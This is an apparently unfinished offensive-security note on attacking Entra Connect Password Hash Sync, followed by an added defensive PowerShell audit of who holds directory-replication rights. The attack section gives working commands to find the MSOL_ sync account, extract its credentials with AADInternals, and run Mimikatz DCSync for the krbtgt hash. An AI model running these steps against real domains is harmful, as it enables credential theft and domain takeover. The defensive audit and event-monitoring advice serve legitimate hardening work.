Password Hash Sync

An on-premises AD can be integrated with Entra ID using Entra Connect with one of the following methods: Password Hash Synchronization (PHS), Pass-through Authentication (PTA), or Federation.

You can enumerate the server where Entra Connect is installed using the following on-prem enumeration (assuming that the server is domain joined, which is the Microsoft recommended method).

This section needs a lot of work, not complete

1. Enumerate the server where Entra Connect is installed

Using the ActiveDirectory module:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Or from Entra ID (the command below uses the Azure AD module):

Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

2. Extract credentials

Once the Entra Connect server is compromised, use the command below from the AADInternals module to extract credentials.

Get-AADIntSyncCredentials

3. Using the creds of the MSOL_* account, we can run DCSync against the on-prem AD

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd

Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
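The MSOL_* account can run DCSync because Entra Connect grants it the directory-replication extended rights on the domain object. As an added defensive check (not part of the original notes), the PowerShell below audits every principal that holds those rights on the domain naming context and flags any that is not a domain controller group, the built-in Administrators group or the MSOL_ sync account. It assumes the ActiveDirectory module (and the AD: drive it provides) is available, and the $Expected list is an assumption that should be tuned to the domain being audited.

```powershell
# Added example, not from the original notes: list who can replicate the domain
# (i.e. who could DCSync) and flag holders that are not expected.
# Assumes the ActiveDirectory module is installed; run from a domain-joined host.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs for directory replication (same in every forest)
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    $domain = Get-ADDomain

    # Assumption: principals that legitimately hold these rights in a default
    # domain. Adjust for your environment (e.g. backup or migration accounts).
    $Expected = @(
        'BUILTIN\Administrators',
        'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
        "$($domain.NetBIOSName)\Domain Controllers",
        "$($domain.NetBIOSName)\Enterprise Read-only Domain Controllers"
    )

    # Read the DACL of the domain naming context through the AD: PSDrive
    $acl = Get-Acl -Path "AD:\$($domain.DistinguishedName)"

    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.ActiveDirectoryRights -match 'ExtendedRight' -and
            $ReplicationRights.ContainsKey($_.ObjectType.ToString())
        } |
        ForEach-Object {
            $id = $_.IdentityReference.Value
            [pscustomobject]@{
                Identity = $id
                Right    = $ReplicationRights[$_.ObjectType.ToString()]
                # The Entra Connect sync account (MSOL_*) is expected to hold these rights
                Expected = ($Expected -contains $id) -or ($id -like '*\MSOL_*')
            }
        }
}

$holders = Get-ReplicationRightHolders
$holders | Sort-Object Identity, Right | Format-Table -AutoSize

# Every entry with Expected = False should be explained or removed: this is the
# least-privilege control that limits who can pull password hashes from the DC.
$holders | Where-Object { -not $_.Expected }
```

This check only inspects explicit replication extended rights; principals with GenericAll or WriteDacl on the domain object can grant themselves the same rights, so they need a separate review. Pair the audit with monitoring of Security event 4662 carrying these GUIDs from any source that is not a domain controller or the Entra Connect server.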
